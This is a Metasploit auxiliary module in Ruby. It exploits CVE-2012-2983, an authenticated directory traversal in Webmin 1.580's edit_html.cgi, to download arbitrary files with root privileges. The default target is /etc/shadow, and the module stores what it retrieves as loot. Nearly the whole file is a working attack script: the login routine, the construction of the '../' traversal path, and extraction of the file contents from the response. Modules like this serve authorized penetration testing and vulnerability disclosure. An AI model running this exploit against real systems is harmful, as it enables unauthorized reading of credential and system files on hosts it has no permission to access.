##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
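class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  # Module metadata and options.
  #
  # The module authenticates against Webmin's session_login.cgi with the
  # supplied USERNAME/PASSWORD and then requests RPATH through the
  # CVE-2012-2983 traversal in file/edit_html.cgi (Webmin 1.580). The CGI
  # runs as root, so any readable file on the host can be retrieved.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access',
        'Description' => %q{
          This module exploits a directory traversal in Webmin 1.580. The vulnerability
          exists in the edit_html.cgi component and allows an authenticated user with access
          to the File Manager Module to access arbitrary files with root privileges. The
          module has been tested successfully with Webmin 1.580 over Ubuntu 10.04.
        },
        'Author' => [
          'Unknown', # From American Information Security Group
          'juan vazquez' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['OSVDB', '85247'],
          ['BID', '55446'],
          ['CVE', '2012-2983'],
          ['URL', 'http://www.americaninfosec.com/research/dossiers/AISG-12-002.pdf'],
          ['URL', 'https://github.com/webmin/webmin/commit/4cd7bad70e23e4e19be8ccf7b9f245445b2b3b80']
        ],
        'DisclosureDate' => '2012-09-06',
        'Actions' => [
          ['Download', { 'Description' => 'Download arbitrary file' }]
        ],
        'DefaultAction' => 'Download',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(10000),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('USERNAME', [true, 'Webmin Username']),
        OptString.new('PASSWORD', [true, 'Webmin Password']),
        # Number of '../' segments prepended to RPATH; 4 matched the tested target
        OptInt.new('DEPTH', [true, 'Traversal depth', 4]),
        OptString.new('RPATH', [ true, 'The file to download', '/etc/shadow' ])
      ]
    )
  end

  # Entry point: authenticate, then fetch RPATH via the traversal and store the
  # returned file body as loot. Prints an error and returns early on any failure.
  def run
    session = webmin_login
    return if session.nil?

    print_status("Attempting to retrieve #{datastore['RPATH']}...")

    traversal = traversal_path

    res = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => '/file/edit_html.cgi',
        'cookie' => "sid=#{session}",
        # vars_get URL-encodes the values. Rex leaves '/', '.', '-' and '_'
        # unencoded, so the '../' sequences reach the server intact while any
        # other special characters in RPATH no longer break the query string.
        'vars_get' => {
          'file' => traversal,
          'text' => '1'
        }
      }, 25
    )

    # The traversal path is compared as a literal substring rather than being
    # interpolated into a regex: RPATH is operator-controlled and may contain
    # regex metacharacters. The textarea capture is non-greedy so a second
    # textarea later in the page does not get swallowed into the loot.
    body_match = nil
    if res && res.code == 200 && res.body.include?(traversal)
      body_match = res.body.match(%r{name=body>(.*?)</textarea>}m)
    end

    if body_match.nil?
      print_error('Failed to retrieve the file')
      return
    end

    # NOTE(review): Webmin may HTML-entity-escape the textarea contents; the
    # body is stored as returned, without decoding — confirm against a target.
    loot = body_match[1]
    fname = ::File.basename(datastore['RPATH'])
    path = store_loot('webmin.file', 'application/octet-stream', rhost, loot, fname, datastore['RPATH'])
    print_good("#{datastore['RPATH']} saved in #{path}")
  end

  # POSTs USERNAME/PASSWORD to session_login.cgi.
  #
  # Returns the value of the 'sid' cookie set on a 302 response, or nil (after
  # printing an error) when the server does not hand out a session.
  def webmin_login
    print_status('Attempting to login...')

    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => '/session_login.cgi',
        # session_login.cgi presumably expects a cookie to already be present
        # (cookie-support check); any value satisfies it.
        'cookie' => 'testing=1',
        # vars_post URL-encodes the credentials, so a password containing
        # '&', '=', '%' or '+' can no longer corrupt the form body.
        'vars_post' => {
          'page' => '/',
          'user' => datastore['USERNAME'],
          'pass' => datastore['PASSWORD']
        }
      }, 25
    )

    sid = nil
    if res && res.code == 302
      sid = res.get_cookies.scan(/sid=(\w+);*/).flatten.first
    end

    if sid.nil? || sid.empty?
      print_error('Authentication failed')
      return nil
    end

    print_good('Authentication successful')
    sid
  end

  # Builds the value sent in the 'file' parameter: DEPTH copies of '../'
  # followed by RPATH verbatim. With the defaults this yields
  # '../../../..//etc/shadow' (RPATH's leading slash is kept).
  def traversal_path
    ('../' * datastore['DEPTH']) + datastore['RPATH']
  end
end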